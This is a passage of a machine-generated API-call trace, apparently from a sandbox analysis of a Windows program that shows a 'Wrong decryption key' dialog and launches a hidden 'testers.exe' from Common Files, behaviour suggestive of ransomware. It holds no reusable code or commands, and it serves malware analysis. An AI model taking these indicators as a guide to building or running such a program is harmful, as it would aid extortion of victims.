lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0274.639] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf200b8 [0274.639] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9460 [0274.639] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a88 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a88 | out: hHeap=0xcc0000) returned 1 [0274.639] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbba8 [0274.639] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a88 [0274.639] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0274.640] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a88 | out: hHeap=0xcc0000) returned 1 [0274.640] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94f0 [0274.640] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a88 [0274.640] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb968 [0274.640] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a88 | out: hHeap=0xcc0000) returned 1 [0274.640] MessageBoxW (hWnd=0x0, lpText="Wrong decryption key", lpCaption="Error!", uType=0x10010) returned 1 [0274.648] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.648] NtdllDialogWndProc_W () returned 0x1 [0274.699] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.699] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.699] NtdllDialogWndProc_W () returned 0x0 [0274.702] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.702] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.702] NtdllDialogWndProc_W () returned 0x0 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] NtdllDialogWndProc_W () returned 0x1 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.703] SetBkColor (hdc=0x670106f8, color=0xf0f0f0) returned 0xf0f0f0 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] NtdllDialogWndProc_W () returned 0x0 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.703] SetBkColor (hdc=0x670106f8, color=0xf0f0f0) returned 0xf0f0f0 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.703] NtdllDialogWndProc_W () returned 0x0 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.703] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.703] NtdllDialogWndProc_W () returned 0x0 [0274.736] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.736] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.736] NtdllDialogWndProc_W () returned 0x0 [0274.736] GetForegroundWindow () returned 0xb0150 [0274.737] GetWindowLongW (hWnd=0xb0150, nIndex=-21) returned 9304344 [0274.756] GetForegroundWindow () returned 0xb0150 [0274.756] GetWindowLongW (hWnd=0xb0150, nIndex=-21) returned 9304344 [0274.806] GetForegroundWindow () returned 0xb0150 [0274.806] GetWindowLongW (hWnd=0xb0150, nIndex=-21) returned 9304344 [0274.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20a) returned 0xd07380 [0274.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a88 [0274.913] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8dedd0) returned 1 [0274.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd07380 | out: hHeap=0xcc0000) returned 1 [0274.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a88 | out: hHeap=0xcc0000) returned 1 [0274.914] KillTimer (hWnd=0xb016c, uIDEvent=0x1) returned 1 [0274.914] SetTimer (hWnd=0xb016c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0274.914] GetForegroundWindow () returned 0xb0150 [0274.915] GetWindowLongW (hWnd=0xb0150, nIndex=-21) returned 9304344 [0274.948] GetForegroundWindow () returned 0xb0150 [0274.948] GetWindowLongW (hWnd=0xb0150, nIndex=-21) returned 9304344 [0275.045] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.045] NtdllDialogWndProc_W () returned 0x0 [0275.046] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.046] NtdllDialogWndProc_W () returned 0x0 [0275.046] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.046] NtdllDialogWndProc_W () returned 0x0 [0275.046] NtdllDefWindowProc_W () returned 0x0 [0275.046] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.047] NtdllDialogWndProc_W () returned 0x1 [0275.048] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.048] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.048] NtdllDialogWndProc_W () returned 0x0 [0275.050] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9460 | out: hHeap=0xcc0000) returned 1 [0275.050] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0275.050] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbba8 | out: hHeap=0xcc0000) returned 1 [0275.050] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb968 | out: hHeap=0xcc0000) returned 1 [0275.050] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94f0 | out: hHeap=0xcc0000) returned 1 [0275.050] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf200b8 | out: hHeap=0xcc0000) returned 1 [0275.050] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0275.051] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0275.051] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0275.051] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0275.051] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0275.051] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0275.051] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0275.051] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0275.051] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0275.051] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.051] GetWindowLongW (hWnd=0xc0170, nIndex=-20) returned 256 [0275.051] NtdllDialogWndProc_W () returned 0x1 [0275.051] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.051] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.051] GetClientRect (in: hWnd=0xc0170, lpRect=0x8df850 | out: lpRect=0x8df850) returned 1 [0275.051] GetCursorPos (in: lpPoint=0x8df860 | out: lpPoint=0x8df860*(x=766, y=509)) returned 1 [0275.051] ScreenToClient (in: hWnd=0xc0170, lpPoint=0x8df860 | out: lpPoint=0x8df860) returned 1 [0275.051] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0275.051] SetCursor (hCursor=0x10003) returned 0x10003 [0275.051] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0275.051] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0275.051] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.051] NtdllDialogWndProc_W () returned 0x0 [0275.051] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0275.052] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0275.052] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.053] NtdllDialogWndProc_W () returned 0x1 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.053] GetSysColor (nIndex=15) returned 0xf0f0f0 [0275.053] SetBkColor (hdc=0x670106f8, color=0xf0f0f0) returned 0xf0f0f0 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.053] NtdllDialogWndProc_W () returned 0x0 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.053] GetSysColor (nIndex=15) returned 0xf0f0f0 [0275.053] SetBkColor (hdc=0x670106f8, color=0xf0f0f0) returned 0xf0f0f0 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.053] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0275.053] NtdllDialogWndProc_W () returned 0x0 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.053] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.054] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0275.054] NtdllDialogWndProc_W () returned 0x0 [0275.066] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0275.066] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0275.066] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0275.066] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0275.066] GetForegroundWindow () returned 0xc0170 [0275.066] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.066] GetCursorPos (in: lpPoint=0x8df940 | out: lpPoint=0x8df940*(x=766, y=509)) returned 1 [0275.067] ScreenToClient (in: hWnd=0xc0170, lpPoint=0x8df940 | out: lpPoint=0x8df940) returned 1 [0275.067] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x24) returned 0xeebb30 [0275.067] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94f0 [0275.067] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a88 [0275.067] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a58 [0275.067] GetAsyncKeyState (vKey=1) returned 1 [0275.067] GetAsyncKeyState (vKey=2) returned 0 [0275.067] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0275.067] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0275.067] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0275.068] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0275.068] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a68 [0275.068] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf200b8 [0275.068] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0275.068] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf200b8 | out: hHeap=0xcc0000) returned 1 [0275.068] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0275.068] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb968 [0275.068] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee4860 [0275.068] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0275.068] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a68 [0275.068] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20a) returned 0xd07380 [0275.068] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a78 [0275.068] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd07380 | out: hHeap=0xcc0000) returned 1 [0275.068] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a78 | out: hHeap=0xcc0000) returned 1 [0275.068] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a78 [0275.068] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23868 [0275.068] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0275.068] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a78 | out: hHeap=0xcc0000) returned 1 [0275.068] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0275.069] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e80 [0275.069] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0275.069] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf200b8 [0275.069] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbba8 [0275.069] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a68 [0275.069] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0275.069] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0275.069] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x42) returned 0xef4bc0 [0275.069] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0275.069] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x2a) returned 0xf51e48 [0275.069] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xf51e48 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0275.069] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x8df750*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x8df718 | out: lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x8df718*(hProcess=0x610, hThread=0x5dc, dwProcessId=0x57c, dwThreadId=0xb0)) returned 1 [0275.078] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xef4bc0 | out: hHeap=0xcc0000) returned 1 [0275.078] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e48 | out: hHeap=0xcc0000) returned 1 [0275.078] CloseHandle (hObject=0x5dc) returned 1 [0275.078] CloseHandle (hObject=0x610) returned 1 [0275.078] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0275.078] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbba8 | out: hHeap=0xcc0000) returned 1 [0275.078] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf200b8 | out: hHeap=0xcc0000) returned 1 [0275.078] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0275.078] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e80 | out: hHeap=0xcc0000) returned 1 [0275.078] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0275.078] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee4860 | out: hHeap=0xcc0000) returned 1 [0275.078] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb968 | out: hHeap=0xcc0000) returned 1 [0275.078] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0275.078] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf200b8 [0275.078] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a68 [0275.078] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20298 [0275.078] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb968 [0275.078] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a78 [0275.079] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb968 | out: hHeap=0xcc0000) returned 1 [0275.079] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf1ff28 [0275.079] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb968 [0275.079] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf200b8 | out: hHeap=0xcc0000) returned 1 [0275.079] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0275.079] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf200b8 [0275.079] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a68 [0275.079] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20518 [0275.079] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbba8 [0275.079] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a98 [0275.079] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbba8 | out: hHeap=0xcc0000) returned 1 [0275.079] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20428 [0275.079] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbba8 [0275.079] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf200b8 | out: hHeap=0xcc0000) returned 1 [0275.079] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0275.079] LockWindowUpdate (hWndLock=0x0) returned 0 [0275.079] DestroyWindow (hWnd=0xb016c) returned 1 [0275.080] NtdllDefWindowProc_W () returned 0x0 [0275.080] KillTimer (hWnd=0xb016c, uIDEvent=0x1) returned 1 [0275.080] Shell_NotifyIconW (dwMessage=0x2, lpData=0x8df520) returned 1 [0275.107] DestroyWindow (hWnd=0xc0170) returned 1 [0275.107] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.107] NtdllDialogWndProc_W () returned 0x0 [0275.107] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.107] NtdllDialogWndProc_W () returned 0x0 [0275.116] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.116] NtdllDialogWndProc_W () returned 0x0 [0275.119] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.119] NtdllDialogWndProc_W () returned 0x1 [0275.120] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.120] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.120] NtdllDialogWndProc_W () returned 0x0 [0275.121] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.121] NtdllDialogWndProc_W () returned 0x0 [0275.121] NtdllDefWindowProc_W () returned 0x0 [0275.121] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.121] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.121] InvalidateRect (hWnd=0xc0170, lpRect=0x0, bErase=1) returned 1 [0275.121] DestroyAcceleratorTable (hAccel=0x1b016b) returned 1 [0275.121] DeleteObject (ho=0xe70a01e2) returned 1 [0275.121] DestroyWindow (hWnd=0xa0174) returned 1 [0275.122] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.122] NtdllDialogWndProc_W () returned 0x0 [0275.122] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6f28 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32f38 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6f10 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32f28 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6ce8 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32e08 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe1bbe8 | out: hHeap=0xcc0000) returned 1 [0275.123] DestroyWindow (hWnd=0x70166) returned 1 [0275.123] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.123] NtdllDialogWndProc_W () returned 0x0 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6f88 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32f98 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6f70 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32f88 | out: hHeap=0xcc0000) returned 1 [0275.123] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6f58 | out: hHeap=0xcc0000) returned 1 [0275.124] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32f78 | out: hHeap=0xcc0000) returned 1 [0275.124] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeabab8 | out: hHeap=0xcc0000) returned 1 [0275.124] DeleteObject (ho=0x440a070e) returned 1 [0275.124] DestroyWindow (hWnd=0xd0164) returned 1 [0275.124] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.124] NtdllDialogWndProc_W () returned 0x0 [0275.124] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6fd0 | out: hHeap=0xcc0000) returned 1 [0275.124] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33c28 | out: hHeap=0xcc0000) returned 1 [0275.124] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed7180 | out: hHeap=0xcc0000) returned 1 [0275.124] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33c38 | out: hHeap=0xcc0000) returned 1 [0275.124] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed7138 | out: hHeap=0xcc0000) returned 1 [0275.124] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33148 | out: hHeap=0xcc0000) returned 1 [0275.124] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf3dcf0 | out: hHeap=0xcc0000) returned 1 [0275.124] DeleteObject (ho=0x750a026a) returned 1 [0275.124] DestroyWindow (hWnd=0x800a2) returned 1 [0275.124] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.124] NtdllDialogWndProc_W () returned 0x0 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb00 | out: hHeap=0xcc0000) returned 1 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32fd8 | out: hHeap=0xcc0000) returned 1 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed95e0 | out: hHeap=0xcc0000) returned 1 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32fb8 | out: hHeap=0xcc0000) returned 1 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb998 | out: hHeap=0xcc0000) returned 1 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33c88 | out: hHeap=0xcc0000) returned 1 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf81ec8 | out: hHeap=0xcc0000) returned 1 [0275.125] DeleteObject (ho=0x820a07ae) returned 1 [0275.125] DestroyWindow (hWnd=0x7010a) returned 1 [0275.125] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.125] NtdllDialogWndProc_W () returned 0x0 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbad0 | out: hHeap=0xcc0000) returned 1 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33c98 | out: hHeap=0xcc0000) returned 1 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbab8 | out: hHeap=0xcc0000) returned 1 [0275.125] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33c48 | out: hHeap=0xcc0000) returned 1 [0275.126] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9340 | out: hHeap=0xcc0000) returned 1 [0275.126] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33c08 | out: hHeap=0xcc0000) returned 1 [0275.126] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf81f70 | out: hHeap=0xcc0000) returned 1 [0275.126] DeleteObject (ho=0x5a0a01d8) returned 1 [0275.126] DestroyWindow (hWnd=0x7015e) returned 1 [0275.126] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.126] NtdllDialogWndProc_W () returned 0x0 [0275.126] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb30 | out: 